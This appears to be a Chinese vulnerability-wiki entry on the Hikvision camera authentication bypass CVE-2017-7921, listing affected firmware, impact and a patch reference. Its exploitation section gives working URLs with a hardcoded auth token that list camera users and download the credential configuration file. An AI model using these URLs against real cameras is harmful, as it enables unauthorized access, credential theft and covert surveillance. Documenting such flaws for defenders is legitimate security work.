跳转至

Hikvision(CVE 2017 7921)

漏洞详情:

在海康威视DS-2CD2xx2F-I Series V5.2.0 build 140721至V5.4.0 build 160530、DS-2CD2xx0F-I Series V5.2.0 build 140721至V5.4.0 build 160401、DS-2CD2xx2FWD Series V5.3.1 build 150410至V5.4.4 build 161125、DS-2CD4x2xFWD Series V5.2.0 build 140721至V5.4.0 build 160414中发现不正确的身份验证问题,DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 build 160421、DS-2DFx Series V5.2.0 build 140805 to V5.4.5 build 160928和DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 build 160106设备。当应用程序没有充分或正确地对用户进行身份验证时,就会出现不正确的身份验证漏洞。这可能允许恶意用户升级其在系统上的权限并获得对敏感信息的访问权限

漏洞危害

成功利用这些漏洞可能会导致恶意攻击者提升其权限或假设已验证用户的身份并获取敏感数据。

利用方式

1.直接上CVE-2017-7921的exp

http://camera.ip/Security/users?auth=YWRtaW46MTEK

可以看到账户名是admin

2、在没有身份验证的情况下获取摄像头快照

3、下载摄像头配置账号密码文件 http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

修复建议

海康威视已发布更新,以减轻通过授权分销商销售的摄像头中的不正确身份验证漏洞。这些更新可从以下位置下载:http://www.hikvision.com/us/about_.html


最后更新: 2021-02-19